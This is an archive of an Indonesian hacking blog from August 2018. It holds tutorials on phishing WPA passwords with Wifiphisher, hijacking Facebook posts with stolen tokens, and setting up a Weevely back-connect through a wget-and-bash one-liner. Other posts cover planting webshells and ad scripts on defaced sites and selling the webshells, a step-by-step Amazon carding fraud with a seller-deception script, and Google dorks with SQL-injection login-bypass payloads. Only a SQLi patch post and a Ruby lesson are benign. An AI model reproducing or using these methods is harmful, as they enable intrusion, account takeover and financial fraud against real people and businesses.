Wednesday, August 29, 2018

New Metode Hack Wi-fi WPA/WPA2 Security Tester





How To Hack Wifi WPA/WPA2 
Oke Para Vokepers Ketemu Lagi Dengan Admin Paling Gans Segans Gansnya Sigans Lebih Gans Lagi Gua Gan:D


George Chatzisofroniou telah menerbitkan Metode baru untuk Meretas WPA / WPA2 Security menggunakan alat rekayasa sosial WiFi yang dirancang untuk mencuri kredensial dari pengguna jaringan nirkabel aman.
Administrator di Universitas Yunani mengembangkan alat WiFi-X/WifiPhiser yang digunakan untuk menemukan dan mereplikasi jaringan yang dilindungi WPA, tanpa kata sandi.




Bagaimana itu bekerja
Wifiphisher/ Wifi-X adalah alat keamanan yang menancapkan serangan phishing otomatis yang cepat terhadap jaringan WPA untuk mendapatkan kata sandi rahasia. Ini adalah serangan rekayasa sosial yang tidak seperti metode lain, itu tidak termasuk pemaksaan kasar. Ini adalah cara mudah untuk memperoleh kredensial WPA.

Wifiphisher bekerja di Kali Linux dan dilisensikan di bawah lisensi MIT.

Dari perspektif korban, serangan itu memanfaatkan dalam tiga fase:

1.) Korban sedang mengalami deauthentikasi dari titik akses mereka. Wifiphisher terus-menerus macet semua perangkat wifi titik akses target dalam jangkauan dengan mengirimkan paket deauth ke klien dari titik akses, ke titik akses dari klien, dan ke alamat broadcast juga.

2.) Korban bergabung dengan jalur akses nakal. Wifiphisher mengendus area dan menyalin pengaturan titik akses target. Ini kemudian menciptakan jalur akses nirkabel nakal yang dimodelkan pada target. Ini juga menyiapkan server NAT / DHCP dan meneruskan port yang tepat. Akibatnya, karena macet, klien akan mulai terhubung ke titik akses nakal. Setelah fase ini, korban adalah MiTMed.

3.) Korban sedang dilayani halaman konfigurasi tampak router yang realistis. wifiphisher menggunakan web server minimal yang merespon permintaan HTTP & HTTPS. Segera setelah korban meminta halaman dari Internet, wifiphisher akan menanggapi dengan halaman palsu realistis yang meminta konfirmasi kata sandi WPA karena upgrade firmware router.

Bagaimana Cara Menjalankannya?? :
Jika Sudah Di Install Command Exploitnya Lalu Kalian Buat Folder

Note : Buat File Di Eksternal Lalu Kalian Pindahkan WifiHacknya Ke Folder Yang Baru Di Buat
Download Tools Wifi-X nya Disini
Kalau Kalian Bingung Bisa Liat Gambar Di Atas :)

Sumber: https://www.nubychan.space/2018/08/new-metode-hack-wpawpa2-security-tester.html?m=1

Monday, August 27, 2018

download tools buatan family attack cyber(publik)

oke watsap men...
ketemu sama mhamhanx gans:D

kali ini mhamhanx akan memberikan sebuah tools Buatan Tim Family Attack Cyber yang sangat bermanfaat didunia perkntlan ini:'V
                                          Tools Ini Pun Cukup Banyak,Gambar Bisa Lihat Dibawah
                                                        Linknya Pun Bisa Comot Dibawah:D
 Link:disini dan disini
 Gmna?TertarikKan:v
Tetapi Tools Ini Free Trialnya Cuman 3Hari Tapi Gpp Lah Lumayan Buat Bantu-Bantu :V

Mungkin Sekian Dari Saya Kurang Lebihnya Mohon Dimaafkan

Tempat Mirror deface Anti Fake

Oke Guys Ketemu Lagi Sama Gua Fake-syst3m

Hmmm banyak sekali defacer jaman skarang yang teamnya kebelet famous, pengen terkenal sampe mereka fake subdomain,blogspot,dll,,padahal mereka gatau kalo nanti bakalan jadi bahan ejekan kepada defacer lain...

Nah kesempatan kali ini gua kan memberikan link tempat mirror anti fake,website buatan tim in crust we crush oke langsung saja ini linknya Mirror,,
Pertama tama hasil mirror kalian akan masuk onhold,pass dua harinya bakalan masuk achive mirror

Mungkin sekian dari saya
Semoga Bermanfaat

Saturday, August 25, 2018

Tutorial Tembak Paketan Xl With Termux

Oke wazzap guys me is back:')

Kali ini we akan memberikan tutorial tembak paketan xl menggunakan termux

Oke langsung saja bagi yg belum punya apknya kalian bisa download diplay store
kita lakukan perintah seperti ini

-pkg install python
- pkg install git
- pip install requests
-git clone https://github.com/joss24242/xl-py
-cd xl-py
-python app.py
-cd xl-py && python app.py

Ohhiyya bagi yang belum tau service id xl bisa cek  Disini passwordnys: www.gebangkiidiw.com
  Untuk Cara menggunkanya pilih angka yang ingin dipilih misal angka 1, ketik saja 1 lalu tekan Enter, gunakan nomer awalan 6281809xxxxxx

Terimakasih semoga manfaat










-Sumber GebangKiddiw

Friday, August 24, 2018

Tutor hack fb orang lain menggunakan token


 Hae Gan Ketemu Lagi Dengan Mimin Fake-Syst3m Admin Tergans Hari Ini:D
Kali Ini Mimin Akan Mengshare Tutorial Hack Post Fb Orang Lain:D

Thanks To Garuda Security Hacker telah mengshare tutorial ini :)
Silahkan download terlebih dahulu script di bawah ini
  silahkan download cektoknya disini touch me
  dan p_editornya disini touch me
setelah didownload kalian edit dulu scriptnya dinotepad ubah extensi nya dari txt ke .php

search di facebook "access_token" dan cari access token :) (Kalo bisa yang baru & jgn yg sudah lama)
Copy access tokennya contoh EAAAAAYsX7TsBAGMEU9X3krq5PRggYAbZASf7okynRS3Rd11TNUqrK3jXjYYylG7VTHQbbdwojz8pq4Ms29C6LoMS9jSCJGTPMEeznhMB5JMXfDFM2AdJP5nxvz4bsrzuawo5mzNYcw4sS1O5DVnaRPz3N9d8uAnImcsKYeh5w5AGr6ZBSLoFD1CbAvKIzorjgvUNWdZAZAlW3w5tpp4D
 dan kita cek apakah masih valid atau tidak token & ceknya silahkan upload cektok.php lewat cpanel atau shell backdoor
dan ternyata masih valid sekarang, upload file p_editor.php & silahkan buka profil korban (kalo di PC silahakn buka versi Mobile) dan klik linimasa
 dan sekarang klik saya saya beri panah
dan copy yang saya kasih garis bawah  https://mobile.facebook.com/story.php?story_fbid=573957306336410&id=100011664386425&refid=17&_ft_=top_level_post_id.573957306336410%3Atl_objid.573957306336410%3Athrowback_story_fbid.573957306336410%3Athid.100011664386425%3A306061129499414%3A2%3A0%3A1525157999%3A5127016190256753684&__tn__=%2AW-R
dan buka p_editor.php silahkan lihat petunjuk foto di bawah
dah sukses! :P
dan klik link tersebut dan taraaaa :P
selesai deh tutorial kali ini :) sekian & terimah kasih

sumber:family attack cyber

Wednesday, August 22, 2018

pengertian spamming didunia carding

Menurut keterangan yang dikutip dari Wikipedia, Spam adalah penggunaan perangkat elektronik (hardware dan software) yang dimaksudkan untuk mengirimkan pesan secara bertubi-tubi kepada satu atau lebih penerima tanpa dikehendaki oleh penerimanya. Orang yang melakukan aktivitas spam adalah spammer dan aktivitasnya disebut spamming. Spam sendiri sebetulnya banyak jenis atau bentuknya misalnya saja spam surel atau surat elektronik, spam SMS, spam IM, spam blog, spam iklan, spam medsos dan lain-lain. Sementara jika dikategorikan berdasarkan tujuannya, aktivitas spam terbagi menjadi 3 jenis utama. Sebagian besar spammer melakukan spamming dengan tujuan promosi atau mengiklankan produk atau jasanya, diikuti dengan tujuan penipuan dan tujuan lain-lain termasuk tujuan iseng.

  • Tujuan Spam.
  1. Tujuan Promosi atau Komersil.

Spam jenis ini biasanya dikirimkan oleh pihak-pihak yang melakukan promosi atau pengiklanan produk atau layanannya. Pesan yang terkandung dalam spam cenderung berbentuk penawaran produk berupa barang, jasa atau layanan. Pelakunya sendiri memang tak terbatas pihak-pihak yang tidak bertanggung jawab saja, pihak operator layanan misalnya operator sesluler pun terkadang mengirimkan pesan-pesan yang menurut saya kurang bermanfaat dengan frekuansi yang diluar nalar. Bayangkan saja jika sebuah layanan operator seluler mengirimkan pesan dengan embel-embel pelayanan lebih dari lima kali dalam tempo 24 jam. Dan kesemua pesan yang dikirimkan selalu sama setiap harinya, bukankah itu spam namanya?
  1. Tujuan Penipuan.

Spam jenis ini yang perlu digarisbawahi dan hendaknya kita berhati-hati jangan sampai tergiur oleh tawarannya. Tak jarang spammer yang mengiming-imingi penerima pesan dengan hadiah yang terbilang besar dan memang bisa diterima dengan akal sehat. Contohnya saja pesan yang mengatasnamakan undian dengan hadiah tertentu disertai dengan nomor telepon atau E-mail customer service-nya. Spam seperti ini juga erat kaitannya dengan aktifitas phising, dimana pengguna atau penerima pesan diarahkan ke website tertentu untuk mengisi formulir dengan data-data pribadi dengan tujuan untuk mencurinya, sungguh merupakan tindakan kriminal. Saya sendiri pernah menerima pesan SMS atas nama perusahaan tertentu dengan isi pesan bahwa saya mendapatkan undian dari sebuah produk. Isi pesan memang meyakinkan karena tidak terdapat nomor pengirim, hanya namanya saja persis seperti pesan yang dikirimkan operator seluler yang hanya mencantumkan nama perusahaan tanpa nomor pengirim. Satu-satunya hal yang meyakinkan saya adalah saya tidak pernah memakai produk yang dimaksud apalagi mengikuti undiannya, berhati-hatilah.
  1. Tujuan Iseng.

Spam dengan tujuan iseng sebenarnya merupakan spam yang termasuk kedalam kategori penipuan namun masih dalam ruang lingkup yang luas dan tidak menjurus ke hal-hal tertentu. Dimana si pengirim spam bertindak berdasarkan peluang, jika si penerima pesan spam merespon aktivitas spamming maka si spammer biasanya mengambil manfaat dan kesempatan, misalnya saja minta pulsa atau meminta mengunjungi website pribadi miliknya dengan tujuan tertentu. Pelaku spam jenis ini memang tidak terbatas, kebanyakan dari kalangan individu yang mencari keuntungan sepihak.
Aktifitas spamming walaupun tidak bertujuan untuk melakukan tindakan kejahatan tetapi terbilang mengganggu, bahkan bersifat meresahkan. Dimana kenyamanan pengguna layanan sedikit banyaknya terganggu oleh aktifitas spammer yang tidak bertanggung jawab.
  • Alat & Bahan untuk Spamming
  1. Mailler
  2. Letter
  3. Maillist
  4. SMTP
Alat dan bahan itu semua berhubungan dengan Carding karena bisa untuk mencari creditcard dll.



-Author Fake-Syst3m

cara menyisipkan virus kedalam file gambar

Hae Sahabat Blogger Ketemu Lagi Dengan Mimin Admin Tamvans,,,Kali Ini Mimin Akan Memberikan Tutorial Menyisipkan Virus Kedalam File Gambar
 Tehnik ini sendiri bernama Steganografi dimana tehnik ini adalah  seni dan ilmu menulis atau menyembunyikan pesan tersembunyi dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia. Sebaliknya, kriptografi menyamarkan arti dari suatu pesan, tapi tidak menyembunyikan bahwa ada suatu pesan. Kata steganografi (steganografi) berasal dari bahasa Yunani steganos, yang artinya “tersembunyi atau terselubung”, dan graphein, “menulis”.
  • Disini saya menggunakan 2 buah file yaitu file dengan nama virus.txt dan gambar.jpg dan taruh dalam 1 folder, di sini nama folder yang saya berikan file.
  • Selanjutnya buka CMD dengan menekan tombot window+R bersamaan.
  • Setelah terbuka kemudian masuk ke direktori tempat folder disimpan. seperti contoh saya menaruh folder di E:/
77777
  
  • Kemudian buka folder file dengan cara sepeti dibawah. 
  • Setelah anda membuka file tersebut kemudian masuk ke langkah-langkah untuk memasukan file ke dalam gambar dengan cara ketikan scrip berikut "copy /b nama file (virus.txt)+file gambar (gambar.png) nama file baru (jadi.png)" kemudian ENTER. Kalau berhasil maka tampilannya seperti berikut.
77aswas
  • Nah setelah proses tadi selesai anda cek folder tempat anda menympan file tadi, jika file dengan nama "jadi.png" ada maka anda berhasil menyisipkan file ke dalam gambar.
Mungkin sekian postingan kali ini dari saya semoga bermanfaat bagi anda semua jika ada pertanyaan silahkan komentar dibawah dan jangan lupan share.
Artikel diatas adalah sebagai pembelajaran, gunakan dengan bijak

Cara Mendapatkan Uang Dengan Menjual Shell Backdoor

Hae Gans Ehh Gan Maksudku,Ketemu Lagi Dengan Saya Fake-Syst3m Admin Paling Gans 2019:D
Kali Ini Saya Akan Memberikan Sedikit Arahan Supaya Shell Backdoor Kita Bisa Menjadi Duid,Daripada Kita Mirror Mending Kita Jual Tuh Buat Beli Kaca Dirumah supaya Bisa Cek Ketamvanans:V
Hmm Bagi Yang Blum Tau Pengertian Shell Backdoor Bisa Cek Disini

Hmmm Oke Langsung Saja
alangkah baiknya kita seblom menebas suatu web kita menyisipkan script popcash atau popads untuk ngumpulin receh dan disini ada beberapa cara untuk mendapatkan uang nya.

Hal yang pertama anda harus mempunyai akun popchas atau popads untuk mengambil script iklan yang akan di pasang pada script kalian.
anda bisa mendaftar popads disini   
dan popcash disni

Saya beri contoh untuk popcash.
Setelah anda mendaftar akun maka tampilan awalnya seperti ini.
Selanjutnya anda tinggal pilih menu Websites pada dasboard popcash anda
Setelah memilih menu websites lalu pilih add a new website.
Lalu anda isi bagian Domain untuk web yang akan anda tebas nantinya, bagian Category pilih sesuai jenis web yang akan anda tebas nantinya, setlah udah lalu pilh add website.
Setelah add website anda tinggal menunggu webnya di Approved.  kemungkinan untuk di Approved adalah dalam waktu 1 x 24 jam .Setelah website di Approved anda bisa mengambil code javascript nya di bagian Get code.

 Setelah mendapatkan code javascript nya anda bisa memasangkan code tersebut dalam script anda di atas </body> atau di bawah <body> . seperti ini :
dengan begitu script kalian terpasang script dari Popchas, pasang di semua website yang kalian deface dan dengan begitu bisa mendapat keuntungan dari deface dengan Iklan ini.
  • Jual Webshell/backdoor
Jika kalian sudah bisa deface dan mempunyai banyak website yang sudah kalian tanam shell backdoor kalian bisa menjual nya.
Banyak orang diluar sana yang mencari webshell dengan server yang "Good"
contoh server nya :
  1. HostGator
  2. Goddady
  3. BlueHost
Jadi, lumayan bukan jika kita menjual webshell dan biasanya 1 webshell berharga Rp.15.000 sampai Rp.50.000 , tergantung server dari website tersebut.
Contoh webshell dengan server hostgator:

 
 

Monday, August 20, 2018

belajar bahasa pemrograman ruby dengan mudah

Menguasai Ruby dalam 20 Menit

Sekarang kita melihat lebih jelas lagi pada program baru kita, perhatikan baris yang paling pertama, dimulai dengan tanda pagar (#). Di Ruby, semua tulisan yang ada sesudah tanda pagar (#) merupakan komentar (comment) dan tidak dipedulikan (di ignore) oleh interpreter. Baris pertama file adalah hal khusus, dan untuk Sistem Operasi Unix biasanya kita menentukan bagaimana menjalankan file. Kemudian komentar selanjutnya untuk penjelasan.
Metode say_hai kita sudah punya trik sedikit:

# Bilang Hai buat semua
def say_hai
  if @names.nil?
    puts "..."
  elsif @names.respond_to?("each")
    # @names adalah list, iterate!
    @names.each do |name|
      puts "Hello #{name}!"
    end
  else
    puts "Hello #{@names}!"
  end
end
Sekarang kelas memperhatikan parameter @names untuk menentukan pilihan. Jika parameter nil, maka print tiga dot (…). Ya karena memang tidak ada yang perlu disapa, khan?!

Perulangan—a.k.a. Iteration

Jika obyek @names merespon metode each, berarti obyek ini merupakan sesuatu yang bisa Anda iterate, jadi iterate lah dan sapalah orang-orang bergantian. Kemudian, jika @names merupakan sesuatu yang lain, biarkanlah obyek ini otomatis menjadi string dan melakukan sapaan secara default.
Mari kita perhatikan iterator lebih dalam lagi:

@names.each do |name|
  puts "Hello #{name}!"
end
each merupakan metode yang menerima blok kode yang kemudian menjalankan blok kode tersebut untuk setiap elemen dalam list, dan diantara do dan end itulah yang dinamakan blok. Blok juga bisa berupa function anonim atau lambda. Variabel diantara karakter pipa itu adalah parameter untuk blok tersebut.
Yang terjadi disini adalah untuk setiap entri dalam list, name terkait dengan elemen list, kemudian ekspresi puts "Hello #{name}!" dijalankan dengan name tersebut.
Kebanyakan bahasa-bahasa pemrograman lain menangani list dengan menggunakan perulangan for, kalau di C seperti ini:

for (i=0; i<total_elemen; i++)
{
  lakukan_sesuatu_dengan(elemen[i]);
}
Kode diatas memang jalan, tetapi tidak begitu elegan. Anda perlu variabel i, untuk mencari tahu berapa panjang/total list, dan juga harus menjelaskan bagaimana menjalani perulangan lewat list tersebut. Ruby way jauh lebih elegan, semua detil disembunyikan di metode each, semua yang perlu Anda lakukan hanyalah memberitahukan apa yang perlu dilakukan dengan elemen each. Secara internal, metode each akan memanggil yield "Steven", kemudian yield "Anton", kemudian yield "Ridho", dan seterusnya.

Blok, Kekuatan Ruby

Kekuatan sesungguhnya tentang blok adalah ketika berhadapan dengan yang lebih rumit ketimbang list. Selain dari berhubungan dengan list, Anda juga bisa menangani setup, teardown dan error (yang mana semua itu diluar dari sepengatahuan user)

# Bilang "sampai jumpa" buat semua
def say_bye
  if @names.nil?
    puts "..."
  elsif @names.respond_to?("join")
    # Gabung (Join) elemen list dengan koma
    puts "Sampai jumpa #{@names.join(", ")}. Datang lagi ya!"
  else
    puts "Sampai jumpa #{@names}. Datang lagi ya!"
  end
end
Metode say_bye tidak menggunakan each, tetapi memeriksa apakah @names merespon metode join, jika Ya, maka gunakan join. Tetapi jika tidak, maka print variabel sebagai string. Metode tidak peduli terhadap type aktual dari variabel, hanya bersandar pada metode-metode yang didukung dikenal sebagai “Duck Typing”, jadi seperti “jalannya seperti bebek dan berbunyi wek wek wek seperti bebek…”. Keuntungan dari cara duck typing ini adalah kita tidak perlu membatasi tipe-tipe variabel apa saja yang didukung. Kalau ada orang yang datang dengan kelas list baru, sepanjang obyek tersebut mengimplementasikan metode join dengan semantik yang sama seperti list, maka semua tetap berjalan sama persis seperti yang sudah direncanakan sebelumnya.

Script Ruby Mulai!

Begitulah akhir cerita kelas BosTukangSapa, akhir dari file hanya memanggil metode-metode pada kelas tersebut. Ada satu trik yang perlu diperhatikan di baris:

if __FILE__ == $0
__FILE__ adalah variabel magic yang berisi nama file saat ini. $0 adalah nama file yang dipakai ketika memulai program. Pemeriksaan ini seolah berkata “Jika file ini merupakan file utama yang digunakan …” Pemeriksaan ini dapat berguna untuk file yang digunakan sebagai library, jadi bukan untuk mengeksekusi kode, tetapi jika file digunakan sebagai executable (file yang bisa dieksekusi/execute) maka eksekusi kode tersebut.

Perdalamlah Kekuatan Ruby Anda

Demikianlah tutorial mini Ruby kita. Masih banyak lagi hal-hal yang bisa dijelajahi, kontrol struktur berbeda yang Ruby tawarkan, penggunaan blok dan yield, module sebagai mixin, dan banyak lagi yang lain. Saya harap tutorial mini ini dapat membuat Anda untuk menjelajahi Ruby lebih lanjut.

sumber

Sunday, August 19, 2018

back connect dengan weevely di termux

h3llc0m3 gengss,
Ketemu Lagi Dengan Mimin Anak Emak Yang Gans SatuSatunya Ini Gk Nurun:V Sebenernya udah lama pengen share tutor ini. Berhubung masih sibuk dengan urusan "Nyata" baru kali ini kesampeean bikin tutorial. Lanjut,
Tutorial ini adalah Alternatif BackConnect Server di Android Dengan Weevely.
Step 1. Buka Termux kalian lalu ketik. › pkg install wget -y › pkg install dos2unix -y › wget https://forumtechnologi.org/cadangan/tools/weev.txt -O weev.sh && dos2unix weev.sh && chmod +x weev.sh && bash weev.sh
Step 2. Setelah running selanjutnya kita akan mendownload Weevely terlebih dahulu, ikuti step by stepnya.
Step 3. Create BackConnect, ikuti step by stepnya.
Step 4. Upload file backconnect yg telah kalian create ke webserver target. › Untuk step ini silahkan kalian upload file backconnect dengan webshell kesayangan kalian
Step 5. Kalian bisa langsung eksekusi webserver yg sudah kalian sisipi backconnect sebelumnya, ikuti step by stepnya.


-Sumber RootEX-

tutorial carding amazon new methode 2018

 hae hae gan ketemu lagi dengan mimin orang tergans abad ini:D

kali ini mimin akan memberikan sebuah tutorial metode co amazon siapa tau ada yang butuh txt nyaa bisa baca bacaa:D
http://zipansion.com/35rji

sebelum lanjut lagi lebih jauh sebaiknya kalian mengetahui apa itu carding,oke sedikit saya jelaskan
carding adalah berbelanja menggunakan nomor dan identitas kartu kredit orang lain, yang diperoleh secara ilegal, biasanya dengan mencuri data di internet. Sebutan pelakunya adalah Carder. Sebutan lain untuk kejahatan jenis ini adalah cyberfroud alias penipuan di dunia maya. Menurut riset Clear Commerce Inc, perusahaan teknologi informasi yang berbasis di Texas – AS , Indonesia memiliki carder terbanyak kedua di dunia setelah Ukrania. Sebanyak 20 persen transaksi melalui internet dari Indonesia adalah hasil carding. Akibatnya, banyak situs belanja online yang memblokir IP atau internet protocol (alamat komputer internet) asal Indonesia. Kalau kita belanja online, formulir pembelian online shop

tidak mencantumkan nama negara Indonesia. Artinya konsumen Indonesia tidak diperbolehkan belanja di situs itu.

Menurut pengamatan ICT Watch, lembaga yang mengamati dunia internet di Indonesia, para carder kini beroperasi semakin jauh, dengan melakukan penipuan melalui ruang-ruang chatting di mIRC. Caranya para carder menawarkan barang-barang seolah-olah hasil carding-nya dengan harga murah di channel. Misalnya, laptop dijual seharga Rp 1.000.000. Setelah ada yang berminat, carder meminta pembeli mengirim uang ke rekeningnya. Uang didapat, tapi barang tak pernah dikirimkan.
jadi itu ripper ya nnjinx:V

oke langsung saja

bahan=
a.acc berpay=akun amazon yang ada credit cardnya
b.rayuan maut
c.seller
d.vpn


1.konek vpn kalian sesuai country acc,,bisa menggunakan nord vpn,vip72 ataupun ipvanish saya menyarankan kalian jangan menggunakan hma pro vpn karena sudah sering terkena veriff:D  ( disini saya mencontohkan menggunakan acc fr )
2.Ubah jam ke brussel
3.Ubah bahasa ke france
4.Hapus data firefox/chrome ( saya sendiri pakai firefox )
5.Buka firefox search about:addons , klik yang paling atas lalu nonaktifkan
6.buka whoer.net pastikan your anomity 90-100%
7.login amazon dengan method lupa pass tanpa mengganti pass ( kode sementara ) menggunakan aplikasi my mail dsb
8.co barang seperti biasa cari seller yang mau ship ke indonesia disini saya menggunakan seller jiayiqi ataupun yichun yaitu seller hoodie 3d
9.buka amazon menggunakan site dekstop
10.klik votre compte
11.klik vos comandos
12.klik masque la comande di barang orderan anda ( barang anda akan hilang/tersembunyi )
13.close firefox , hapus data firefox
14.tunggu barang prepare sekitar 2-3 jam
15.setelah 2-3 jam anda lakukan seperti step ke 5
16.buka amazon dengan site dekstop
17.login amazon dengan method ganti pass
18.cek barang sudah prepare/blm
19.jika sudah prepare ganti email 2× email pertama asal"an, email kedua sesuaikan dengan email si bule ( jangan pake yopmail )
20.contact seller untuk minta ganti alamat menggunakan rayuan anda masing"
contoh rayuan maut
Hello,

I want to change the shipping address for my order.

I had a brother, is fake-syst3m
on his birthday I wanted to give him a surprise The Mask

If you can, please change the delivery address to the address of my brother

The address is :

Name :namamu

Address 1 :alamatmu

Address 2 :

City:kotamu

Zip code :kode posmu

Country : indonesia

Phone :0000xxxx

Thank you very much
jika seller mau ship ke indonesia nanti akan mucul no resi di email si bule,lalu kalian bisa mengetahui perjalanan pengantaran barang menggunakan aplikasi 17track
21.done tinggal tunggu tn keluar

Selamat mencoba :)

Nb : 1.jangan menggunakan vpn hma karna udah ga work ( sering kena verif )
        2.selama menunggu prepare jangan mematikan hma , mengganti bahasa , mengganti jam
        3.jangan login berulang" di amazon untuk cek prepare
        4.hapus bersih semua email dari amazon di email si bule
        5.jangan memperjual beli kan method ini ( method kok di jual )
        6.admin tidak bertanggung jawab jika tutor ini disalah gunakan


-Fake-Syst3m





Saturday, August 18, 2018

tutorial patch bug sqli





hae guys ketemu lagi sama mimin:D
Kali Ini Mimin Akan Memberikan Tutorial Patch Bug Sqli Sangat Penting Buat Developer Yang Web Nyaa Terkena Deface:D
Oke Langsung Ajalah

pas kita kasih tanda kutip (') dibelakang angkanya nanti akan muncul tulisan seperti ini
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
nah berarti website itu menunjukan kerentanan terhadap sqli

contoh page yang vuln http://site.com/berita.php?id=18
maka yang vuln di /berita.php
kita buka berita.php

contoh script yang vuln sqli
<?php 

$id_nya = $_GET['id'];
$qberita = "SELECT * from anu, cat where id_nya='$id_nya' and berita.idcat = cat.idcat";
$berita = mysql_query($qberita);

?> 
 
source code di atas tidak ada filter karakter seperti string ( ' ) dan min ( - ) sehingga bisa di inject ,jadi di beri filter supaya tidak bisa di inject


1.dengan memberi perintah is_numeric

Perintah is_numeric


if(!is_numeric($id_nya)) {

    echo "patched in fake-syst3m";

    exit;

  }

jika $id_nya bukan numeric maka akan muncul tulisan "patched in fake-syst3m"

2. dengan memberi mysql_real_escape_string

mysql_real_escape_string di gunakan untuk memberi backslash di beberapa kode untuk di tampilkan pada halaman , jadi semisal seseorang menginject nya maka tidak akan muncul mysql error blablablaa;V , blank dan lain sebagai nya . asedeeeeeentod:v










mysql_real_escape_string

$id_nya = mysql_real_escape_string($_GET['id']);

jadi seperti itulah,kurang lebihnya mohon dimaafkan karena saya juga lagi proses belajar menjadi perogemer web:D
 
thanks to all member IndoSec And IndoXploit
special thanks to Mr.b0g3l 

mencari halaman admin login menggunakan dork



assalamualaikum gan ketemu lagi dengan saya fake-syst3m is back:v

pada kesempatan kali ini saya akan memeberikan tricks mencari halaman admin login dengan dorking,saya sih biasanya menggunakan tools admin finder biar gk lamaa,tapi kadang juga pake dorking biar gk manjaa banged:V

oke langsung aja
caranya cukup mudah

dorking login admin web nya di google atau search engine lain

dork nya yang berhubungan dengan admin login , misal :

inurl:/admin/
inurl:/login.php
intext:"Username"
intext:"Password"
inurl:phpmyadmin

dan lain lain intinya yang berhubungan dengan admin login


lalu kita tambahkan site target di belakang nya

contoh : inurl:/login.php site:www.sitemu.com
                inurl:/admin/ site:www.sitemu.com

 dan lain lain bisa kalian kembangkan sendiri ,


sekian semoga bermanfaat

wassalamualaikum wr.wb

Penyebab Terjadinya Bug Sqli

Oke Whatsapp Guys Comback Lagi Nihh Sigans Dari Gua Hiro:v
dah lama gak update tutor yaa:v
Kali Ini We Akan Sharing Penyebab Terjadinya Bug Sqli
Hehehe Jadi Gini Gan Kemaren-Kemaren Banyak Defacer Yang Fake Deface Di Def Aidi Mirror Sampe Rank1 Pas Ditanya Apa Penyebab Bug Sqli Diapun Terdiam:v
Oke Langsung Saja
Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?

1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
4) saat si hacker berhasil upload shell kedalam web, si hacker akan bisa melakukan apa saja dengan fasilitas yg dimiliki shellnya dan otak nya wkwkwk


Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL




Contoh sintaks SQL Injection

1) Sintaks SQL string ‘-- setelah nama username
2) Query database

Contoh sintaks SQL Injection
SQL Injection melalui URL


Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
